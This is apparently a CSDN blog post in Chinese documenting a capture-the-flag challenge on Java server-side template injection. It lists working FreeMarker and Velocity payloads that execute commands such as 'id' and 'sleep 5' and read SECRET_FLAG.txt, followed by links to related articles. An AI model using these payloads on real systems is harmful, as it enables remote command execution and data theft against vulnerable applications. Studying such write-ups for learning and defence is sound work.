free java server_Java - Server-side Template Injection

最新推荐文章于 2023-10-03 17:00:34 发布
最新推荐文章于 2023-10-03 17:00:34 发布
阅读量161 收藏
点赞数
文章标签: free java server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33601966/article/details/114497675
版权

Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.

SSTI -------------------------服务端模板注入

服务器端模板:

https://www.netsparker.com/blog/web-security/server-side-template-injection/

服务器端模板提供了一种管理HTML代码动态生成的简便方法。最大的优点是您可以生成动态HTML页面,这些页面在服务器端的读取方式类似于静态HTML。

8bf85ec1a262a0a644dd7b39f77b1cd5.png

d44e317be4d1b601703c7f849bb9d0eb.png

挑战:

nickname=${"1-1"} --------------------->双引号中的类容会被显示在网页中

freemaker的payload:

${ ex("id") }

Velocity的payload:

$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor()

使用freemaker成功执行:  whoami

a8933a2ba6dbb7541c404217cc60bcd0.png

payload:

nickname=

${ ex("cat SECRET_FLAG.txt") }

355434186cc2171d6064581f0db690b1.png

小小羊羊羊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
XVWA SSTI Server Side Template Injection
baynk的博客
04-08 905
0x00 Server Side Template Injection (SSTI) Web application uses templates to make the web pages look more dynamic. Template Injection occurs when user input is embedded in a template in an unsafe mann...
burpsuit 靶场(Server-side template injection)
wanan的博客
01-23 295
burpsuit 靶场(Server-side template injection)
服务器模板注入 SSTI (Server-side template injection
angry_program的博客
08-05 2756
一、服务器模板注入 服务器模板注入(Server-side template injection)是当攻击者能够用本地的模板语法去注入一个恶意的payload,然后再服务器端执行该模板的攻击手法。 模板引擎是通过将固定模板与多变数据结合起来生成html网页的一种技术,当用户直接输入数据到模板不作任何过滤的时,可能会发生服务端模板注入攻击。这使得攻击者可以注入任何模板指令来操控服务器模板引擎,从而使整个服务器被控制。 顾名思义,服务器模板注入和SQL注入大同小异,但SSTI是发生在服务器端的,更加危险。
服务端模板注入(SSTI)上
why811的博客
07-18 756
在handleCache内,首先判断有没有开启options.cache此值默认为空,所以没有进去if区间,然后在elseif处判断了hasTemplate的值是否为空,此值的定义是从arguments.length得到的,所以此值不为空,也没有进入到elseif区间内,然后就到了exports.compile处,这里在调用compile方法时把模板传入,继续跟踪此方法。内建函数很像子变量(也像Java中的方法),它们并不是数据模型中的东西,是Freemarker在数值上添加的。
GBase8a_MPP_Cluster-NoLicense-FREE-8.6.2_build43-R7-redhat7.3-x86_64.tar.bz2
05-12
国产数据库Gbase 8a集群安装包,GBase8a_MPP_Cluster-NoLicense-FREE-8.6.2_build43-R7-redhat7.3-x86_64.tar.bz2
allegro_free_viewer_17-2
03-06
allegro_free_viewer_17-2
allegro_free_viewer_17-2 - 1fen
10-30
Allegro/OrCAD FREE Physical Viewer The Cadence® Allegro®/OrCAD® FREE Physical Viewer is a free download that allows you to view and plot databases from Allegro PCB Editor, OrCAD PCB Editor, Allegro...
freecelljsolver-1.1.0.zip_freecell Java源码_纸牌
09-24
FreeCell Java源码解析与纸牌游戏自动化技术探析》 在计算机科学与软件工程领域,游戏开发是一项富有挑战性的任务,它涉及到算法设计、数据结构优化以及用户体验等多个方面。今天,我们将深入探讨一款名为...
MDB-Free_4.19.0_java_java编程_Free!_
10-04
标题“MDB-Free_4.19.0_java_java编程_Free!”揭示了这是一款与Java编程相关的软件或库,特别地,它可能是一个用于处理MDB(可能是Microsoft Access数据库)文件的工具,版本号为4.19.0。"Free!"标签暗示它是免费...
freejava
11-24
freejava freejava
template-injection-workshop:模板注入研讨会(6个练习),涵盖了Twig,Jinja2,Tornado,Velocity和Freemaker引擎
05-23
模板注入车间 该存储库包含在Hackfest 2020上展示的所有测试应用程序。 阅读教程 幻灯片: : 自己运行应用程序 所有应用程序代码和docker脚本都包含在此存储库中。 构建过程将根据技术(Python,PHP或Java)而有所不同。 首先,从克隆存储库或库。 请参阅每个单独应用程序的自述文件。 git clone https://github.com/GoSecure/template-injection-workshop.git
freejava-开源
07-20
freejava 是一套让 Java 编程更轻松、更快捷的工具包!
freejava_cn
11-09
一个相当好用的java编译软件
org.freejava.javasourceattacher_1.2.3_.jar
11-05
org.freejava.javasourceattacher_1.2.3_.jarorg.freejava.javasourceattacher_1.2.3_.jar
SSTI(服务器模板注入
最新发布
jdk12123的博客
10-03 182
与sql注入类似:都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。
Server-side template injection (SSTI)学习笔记
汗的博客
05-03 1579
文章目录阅读文档了解基本模板语法Lab: Basic server-side template injectionLab: Basic server-side template injection (code context)了解安全隐患寻找已知漏洞探索开发人员提供的对象创建自定义攻击 阅读文档 文档是最有用的信息来源,例如,一旦您知道正在使用基于Python的Mako模板引擎,实现远程代码执行就...
javafree,FreeJava 的使用方法(三)FreeJava的使用,freejava使用方法
热门推荐
weixin_30249465的博客
03-10 1万+
FreeJava 的使用方法(三)FreeJava的使用,freejava使用方法4.FreeJava的使用好了,也该进入正题了,讲讲它的使用方法了。我们先不全面的介绍它,而先来给大家介绍一个Hello的程序的编辑过程。这是一个最基本的程序,通过一步一步的引导,相信你能很容易的掌握它的使用方法了。1. 新建工程启动FreeJava,进入FreeJava主界面,如果你的程序是第一次运行的话,它将会弹...
SSTI模板注入
qq_48904485的博客
03-22 5006
一、SSTI简介 SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。 sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。 SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值